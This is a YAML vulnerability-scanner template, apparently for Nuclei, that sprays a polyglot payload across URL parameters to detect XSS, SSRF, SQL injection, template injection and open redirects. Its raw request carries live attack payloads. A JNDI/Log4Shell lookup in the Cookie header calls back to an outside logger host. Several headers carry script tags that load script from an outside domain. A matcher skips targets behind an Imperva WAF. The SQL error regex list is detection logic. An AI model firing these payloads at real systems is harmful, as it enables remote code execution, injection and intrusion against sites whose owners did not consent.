id: poly-xss-params-rhel

info:
  name: Polyglot Template to detect XSS/SSRF/SQLi/SSTI & Open redirects
  author: rhel
  severity: high
  description: Tries a single polyglot payload for each param and detects any matches
  tags: xss,ssrf,sqli,ssti

variables:
  logger: 'z.vii.One'
  payload: "{{logger}}?\\%22\\''%22/%3e%3e%3c%3cs%3ebleh${{7*7}}"
requests:
  - method: GET
    path:
      - "{{BaseURL}}/%5c'%5c%22'%22/%3e%3e%3c%3cs%3ebleh"
      - "{{BaseURL}}/?%5c'%5c%22'%22/%3e%3e%3c%3cs%3ebleh=1"

  - raw:
    - |+
      GET /?{{param}}=http://{{param}}.{{Host}}.{{payload}} HTTP/1.1
      Host: {{Hostname}}
      Accept: '\'\"">\>\<<script/src='//ac.cm2.pW/m?{{Hostname}}'>><</script>>
      Cookie: OFBiz.Visitor=${jndi:rmi://{{Host}}.of.${hostName}.{{logger}}}
      Referer: '\'\"">\>\<<script/src='//rf.cm2.pW/m?{{Hostname}}'>><</script>>
      X-Forwarded-For: '\'\"">><<script/src='//xf.cm2.pW/m?{{Hostname}}'></script>
      X-Forwarded-Host: '\'\"">><<script/src='//xh.cm2.pW/m?{{Hostname}}'></script>
      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0'\'\"">\>\<<script src='https://ua.cm2.pW/m?{{Hostname}}'>><</script>>
      Connection: close

    threads: 50
    payloads:
      param: /home/rhel/tools/ztask/wordlists/xss-params.txt

    stop-at-first-match: true
    matchers-condition: or
    matchers:
      # For XSS/SSRF
      - type: dsl
        dsl:
          - "!regex('30[1-8]', status_code)"
          - "!(regex('application/(json|javascript)', content_type) || regex('text/(plain|json|javascript)', content_type))"
          - regex("canary[\"\']+>><", body) || regex("(?i)[\'\"]/?[<>]+<s>bleh", body)
        condition: and

      # For SSTI/SSRF
      - type: regex
        part: all
        condition: or
        regex:
          - 'bleh[{7*$}]*49'

      # For SQLi
      - type: regex
        part: body
        condition: or
        regex:
          - "SQL syntax.*?MySQL"
          - "Warning.*?\\Wmysqli?_"
          - "MySQLSyntaxErrorException"
          - "valid MySQL result"
          - "check the manual that (corresponds to|fits) your MySQL server version"
          - "check the manual that (corresponds to|fits) your MariaDB server version"
          - "check the manual that (corresponds to|fits) your Drizzle server version"
          - "Unknown column '[^ ]+' in 'field list'"
          - "MySqlClient\\."
          - "com\\.mysql\\.jdbc"
          - "Zend_Db_(Adapter|Statement)_Mysqli_Exception"
          - "Pdo[./_\\\\]Mysql"
          - "MySqlException"
          - "SQLSTATE\\[\\d+\\]: Syntax error or access violation"
          - "MemSQL does not support this type of query"
          - "is not supported by MemSQL"
          - "unsupported nested scalar subselect"
          - "PostgreSQL.*?ERROR"
          - "Warning.*?\\Wpg_"
          - "valid PostgreSQL result"
          - "Npgsql\\."
          - "PG::SyntaxError:"
          - "org\\.postgresql\\.util\\.PSQLException"
          - "ERROR:\\s\\ssyntax error at or near"
          - "ERROR: parser: parse error at or near"
          - "PostgreSQL query failed"
          - "org\\.postgresql\\.jdbc"
          - "Pdo[./_\\\\]Pgsql"
          - "PSQLException"
          - "Driver.*? SQL[\\-\\_\\ ]*Server"
          - "OLE DB.*? SQL Server"
          - "\\bSQL Server[^&lt;&quot;]+Driver"
          - "Warning.*?\\W(mssql|sqlsrv)_"
          - "\\bSQL Server[^&lt;&quot;]+[0-9a-fA-F]{8}"
          - "System\\.Data\\.SqlClient\\.(SqlException|SqlConnection\\.OnError)"
          - "(?s)Exception.*?\\bRoadhouse\\.Cms\\."
          - "Microsoft SQL Native Client error '[0-9a-fA-F]{8}"
          - "\\[SQL Server\\]"
          - "ODBC SQL Server Driver"
          - "ODBC Driver \\d+ for SQL Server"
          - "SQLServer JDBC Driver"
          - "com\\.jnetdirect\\.jsql"
          - "macromedia\\.jdbc\\.sqlserver"
          - "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception"
          - "com\\.microsoft\\.sqlserver\\.jdbc"
          - "Pdo[./_\\\\](Mssql|SqlSrv)"
          - "SQL(Srv|Server)Exception"
          - "Unclosed quotation mark after the character string"
          - "Microsoft Access (\\d+ )?Driver"
          - "JET Database Engine"
          - "Access Database Engine"
          - "ODBC Microsoft Access"
          - "Syntax error \\(missing operator\\) in query expression"
          - "\\bORA-\\d{5}"
          - "Oracle error"
          - "Oracle.*?Driver"
          - "Warning.*?\\W(oci|ora)_"
          - "quoted string not properly terminated"
          - "SQL command not properly ended"
          - "macromedia\\.jdbc\\.oracle"
          - "oracle\\.jdbc"
          - "Zend_Db_(Adapter|Statement)_Oracle_Exception"
          - "Pdo[./_\\\\](Oracle|OCI)"
          - "OracleException"
          - "CLI Driver.*?DB2"
          - "DB2 SQL error"
          - "\\bdb2_\\w+\\("
          - "SQLCODE[=:\\d, -]+SQLSTATE"
          - "com\\.ibm\\.db2\\.jcc"
          - "Zend_Db_(Adapter|Statement)_Db2_Exception"
          - "Pdo[./_\\\\]Ibm"
          - "DB2Exception"
          - "ibm_db_dbi\\.ProgrammingError"
          - "Warning.*?\\Wifx_"
          - "Exception.*?Informix"
          - "Informix ODBC Driver"
          - "ODBC Informix driver"
          - "com\\.informix\\.jdbc"
          - "weblogic\\.jdbc\\.informix"
          - "Pdo[./_\\\\]Informix"
          - "IfxException"
          - "Dynamic SQL Error"
          - "Warning.*?\\Wibase_"
          - "org\\.firebirdsql\\.jdbc"
          - "Pdo[./_\\\\]Firebird"
          - "SQLite/JDBCDriver"
          - "SQLite\\.Exception"
          - "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException"
          - "Warning.*?\\W(sqlite_|SQLite3::)"
          - "\\[SQLITE_ERROR\\]"
          - "SQLite error \\d+:"
          - "sqlite3.OperationalError:"
          - "SQLite3::SQLException"
          - "org\\.sqlite\\.JDBC"
          - "Pdo[./_\\\\]Sqlite"
          - "SQLiteException"
          - "SQL error.*?POS([0-9]+)"
          - "Warning.*?\\Wmaxdb_"
          - "DriverSapDB"
          - "-3014.*?Invalid end of SQL statement"
          - "com\\.sap\\.dbtech\\.jdbc"
          - "\\[-3008\\].*?: Invalid keyword or missing delimiter"
          - "Warning.*?\\Wsybase_"
          - "Sybase message"
          - "Sybase.*?Server message"
          - "SybSQLException"
          - "Sybase\\.Data\\.AseClient"
          - "com\\.sybase\\.jdbc"
          - "Warning.*?\\Wingres_"
          - "Ingres SQLSTATE"
          - "Ingres\\W.*?Driver"
          - "com\\.ingres\\.gcf\\.jdbc"
          - "Exception (condition )?\\d+\\. Transaction rollback"
          - "com\\.frontbase\\.jdbc"
          - "Syntax error 1. Missing"
          - "(Semantic|Syntax) error [1-4]\\d{2}\\."
          - "Unexpected end of command in statement \\["
          - "Unexpected token.*?in statement \\["
          - "org\\.hsqldb\\.jdbc"
          - "org\\.h2\\.jdbc"
          - "\\[42000-192\\]"
          - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)"
          - "\\[MonetDB\\]\\[ODBC Driver"
          - "nl\\.cwi\\.monetdb\\.jdbc"
          - "Syntax error: Encountered"
          - "org\\.apache\\.derby"
          - "ERROR 42X01"
          - ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):"
          - "/vertica/Parser/scan"
          - "com\\.vertica\\.jdbc"
          - "org\\.jkiss\\.dbeaver\\.ext\\.vertica"
          - "com\\.vertica\\.dsi\\.dataengine"
          - "com\\.mckoi\\.JDBCDriver"
          - "com\\.mckoi\\.database\\.jdbc"
          - "&lt;REGEX_LITERAL&gt;"
          - "com\\.facebook\\.presto\\.jdbc"
          - "io\\.prestosql\\.jdbc"
          - "com\\.simba\\.presto\\.jdbc"
          - "UNION query has different number of fields: \\d+, \\d+"
          - "line \\d+:\\d+: mismatched input '[^']+'. Expecting:"
          - "Altibase\\.jdbc\\.driver"
          - "com\\.mimer\\.jdbc"
          - "Syntax error,[^\\n]+assumed to mean"
          - "io\\.crate\\.client\\.jdbc"
          - "encountered after end of query"
          - "A comparison operator is required here"
          - "-10048: Syntax error"
          - "rdmStmtPrepare\\(.+?\\) returned"
          - "SQ074: Line \\d+:"
          - "SR185: Undefined procedure"
          - "SQ200: No table "
          - "Virtuoso S0002 Error"
          - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]"

      # For Open Redirect
      - type: dsl
        condition: and
        dsl:
          - regex('30[1-8]', status_code)
          - regex("^([\\/]{2,}|https?:)[/]*[^/?]+\.vii\.one[^ ]+",to_lower(location))
          - "!contains(tolower(all_headers), 'x-xss-payload')"

      # avoid WAF, I guess they're not vulnerable anyway
      - type: word
        condition: or
        part: header
        words:
          - ': Imperva'
          - ': incap_ses_'
